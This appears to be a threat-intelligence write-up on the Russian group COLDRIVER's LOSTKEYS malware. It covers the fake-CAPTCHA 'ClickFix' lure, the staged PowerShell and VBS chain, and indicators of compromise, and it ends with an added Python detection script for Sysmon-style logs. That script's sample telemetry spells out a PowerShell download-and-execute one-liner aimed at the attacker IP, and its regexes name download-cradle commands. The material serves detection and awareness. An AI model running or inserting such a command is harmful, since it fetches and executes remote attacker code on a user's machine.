UNC4057 LOSTKEYS
COLDRIVER, a Russian government-backed group, targets Western organizations and non-governmental organizations with its new malware, LOSTKEYS.
A new piece of malware called LOSTKEYS has been used by the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) to steal documents from non-governmental organizations (NGOs) and Western targets. The Google Threat Intelligence Group (GTIG), which has tracked COLDRIVER for years, including the group's SPICA malware in 2024, assesses that LOSTKEYS is a new addition to its toolkit.
COLDRIVER's main activity is credential phishing against high-profile targets, typically reaching people at NGO addresses or at their personal email accounts. Once the group gains access to a target's account, it steals login credentials, exfiltrates emails and harvests contact lists. In certain cases, COLDRIVER also tries to access system files and infect target devices with malware.
COLDRIVER’s recent attacks have targeted journalists, think tanks, NGOs, and former and present advisors to Western governments and militaries. Additionally, the group has persisted in targeting those with ties to Ukraine. It is thought that gathering intelligence in support of Russia’s strategic objectives is the main objective of COLDRIVER’s actions. In a few instances, the group has been connected to hack-and-leak efforts that targeted an NGO and UK officials.
The new malware, LOSTKEYS, was observed in January, March, and April of 2025. It steals files from a hard-coded list of directories and extensions and also sends the attacker system information and a list of running processes. Although COLDRIVER usually uses stolen credentials to reach contacts and emails, it has occasionally deployed malware such as SPICA to reach documents on a target machine. LOSTKEYS is built to accomplish a similar goal and is used only in very specific situations.
The multi-step infection chain that delivers LOSTKEYS starts with a lure website carrying a fake CAPTCHA. Once the CAPTCHA appears to have been "verified," the page copies PowerShell code to the user's clipboard and instructs the user to run it through Windows' "Run" prompt. This technique, sometimes called "ClickFix," socially engineers targets into copying, pasting, and running PowerShell scripts. According to GTIG, numerous APT and financially motivated attackers employ this tactic, and it has been widely publicised.
The first-stage PowerShell retrieves and runs the second stage. In several of the observed cases, this second stage was fetched from the IP address 165.227.148[.]68. The second stage includes a device-evasion step: it computes the MD5 hash of the display resolution and halts execution if the hash matches one of three hard-coded values, most likely to avoid running inside virtual machines (VMs). To obtain the next stage, the request must contain identifiers that are unique to each observed instance of the chain. In every observed case, the third stage is retrieved from the same host as the preceding stages.
The third stage is a Base64-encoded blob that decodes into more PowerShell. Its job is to retrieve and decode the final LOSTKEYS payload. To do so, it downloads two more files from the same host, again using identifiers unique to each infection chain. The first file downloaded, the "decoder," is a Visual Basic Script (VBS) responsible for decoding the second file. The decoding uses two keys, both unique to each infection chain: one is embedded in the decoder script and the other is stored in stage 3. With these keys, a substitution cipher is applied to the encoded blob.

The final payload, LOSTKEYS, is a VBS script that performs the file theft and system-information gathering.
During the investigation into this activity, two further samples that executed LOSTKEYS were found, dating from as early as December 2023. These earlier samples are Portable Executable (PE) files posing as being related to the Maltego software, so they differ significantly from the execution chain seen from 2025 onwards. It is still unknown whether these December 2023 samples are directly connected to COLDRIVER or whether the malware was repurposed from another operation into the activity observed starting in January 2025. Hashes for these binaries and related command-and-control (C2) addresses, such as njala[.]dev and 80.66.88[.]67, are among the indicators of compromise (IOCs) being shared.
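The delivery chain above (ClickFix PowerShell from the Run prompt, stage fetches from 165.227.148[.]68, VBS decoder and VBS payload) and the C2 indicators from the December 2023 samples give a defender three concrete things to look for in endpoint telemetry. The script below is an added example, not code from the original post or from GTIG: it runs three detection rules over constructed Sysmon-style events (process creation, network connection, DNS query). The field names, the sample paths and script names, the URL path `stage2`, and the command-line tokens treated as a "download cradle" are assumptions, since the article does not print the actual PowerShell one-liner; the IP addresses and domain are the ones the article names, refanged so they can be compared against log fields.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Network indicators named in the article (printed defanged there, refanged here).
IOC_IPS = {"165.227.148.68", "80.66.88.67"}
IOC_DOMAINS = {"njala.dev"}

SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Tokens typical of a pasted download-and-execute one-liner.  Assumption: the
# article describes ClickFix but does not show the exact script used.
CRADLE_RE = re.compile(
    r"iex|invoke-expression|downloadstring|invoke-webrequest|\birm\b|\biwr\b|frombase64string",
    re.IGNORECASE,
)
# A .vbs launched from a user-writable location, where a dropped script would land.
USER_WRITABLE_VBS_RE = re.compile(r'(\\users\\|\\appdata\\|\\temp\\)[^\s"]*\.vbs', re.IGNORECASE)


@dataclass
class Event:
    """Minimal Sysmon-like record: id 1 = process create, 3 = network, 22 = DNS."""
    id: int
    image: str
    parent: str = ""
    cmdline: str = ""
    dst_ip: str = ""
    query: str = ""


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_clickfix_shell(ev: Event) -> bool:
    """Stage 1: PowerShell whose parent is explorer.exe (what the Run prompt
    spawns from) and whose command line carries a download cradle."""
    return (
        ev.id == 1
        and _basename(ev.image) in SHELLS
        and _basename(ev.parent) == "explorer.exe"
        and CRADLE_RE.search(ev.cmdline) is not None
    )


def rule_script_host_from_shell(ev: Event) -> bool:
    """Stage 3 / payload: wscript or cscript spawned by PowerShell to run a .vbs
    from a user-writable directory (both the decoder and LOSTKEYS are VBS)."""
    return (
        ev.id == 1
        and _basename(ev.image) in SCRIPT_HOSTS
        and _basename(ev.parent) in SHELLS
        and USER_WRITABLE_VBS_RE.search(ev.cmdline) is not None
    )


def rule_ioc_network(ev: Event) -> bool:
    """Any process contacting an IP or domain listed in the article."""
    if ev.id == 3:
        return ev.dst_ip in IOC_IPS
    if ev.id == 22:
        return ev.query.lower().rstrip(".") in IOC_DOMAINS
    return False


RULES: Dict[str, Callable[[Event], bool]] = {
    "clickfix_shell": rule_clickfix_shell,
    "script_host_from_shell": rule_script_host_from_shell,
    "ioc_network": rule_ioc_network,
}


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on an event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: paths, script names and the URL path are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(1, PS, parent=r"C:\Windows\explorer.exe",
          cmdline='powershell.exe -w hidden -c "iex ((New-Object Net.WebClient)'
                  '.DownloadString(\'http://165.227.148.68/stage2\'))"'),
    Event(3, PS, dst_ip="165.227.148.68"),
    Event(1, r"C:\Windows\System32\wscript.exe", parent=PS,
          cmdline=r'wscript.exe "C:\Users\alice\AppData\Local\Temp\decoder.vbs"'),
    Event(1, PS, parent=r"C:\Windows\explorer.exe",                       # benign admin script
          cmdline=r"powershell.exe -NoProfile -File C:\Scripts\nightly_backup.ps1"),
    Event(22, r"C:\Users\alice\Downloads\maltego_update.exe", query="njala.dev"),
    Event(22, r"C:\Program Files\Google\Chrome\Application\chrome.exe", query="www.google.com"),
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {name}: {ev.cmdline or ev.dst_ip or ev.query}")
```

The IOC rule is the weakest of the three, since the actors can rotate hosts; the two behavioural rules (Run-prompt PowerShell carrying a cradle, and a script host spawned by PowerShell on a VBS in a user-writable path) survive that rotation and are worth tuning against your own baseline before alerting on them.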
Google Threat Intelligence Group uses its research on threat actors like COLDRIVER to improve the security and safety of Google's products and to protect users who are at risk. All harmful websites, domains, and files are added to Safe Browsing as soon as they are found. Government-backed attacker notifications alert targeted Gmail and Workspace users to the activity. Potential targets are advised to enrol in Google's Advanced Protection Program, turn on Enhanced Safe Browsing for Chrome, and keep all devices fully up to date.
Google is committed to sharing its findings with the security community to raise awareness and support organizations and individuals who may have been targeted. Sharing this knowledge of tactics and techniques is intended to improve threat-hunting capabilities and lead to stronger user protections across the industry. The original post contains YARA rules and indicators of compromise, and it is also available as a Google Threat Intelligence collection and rule pack.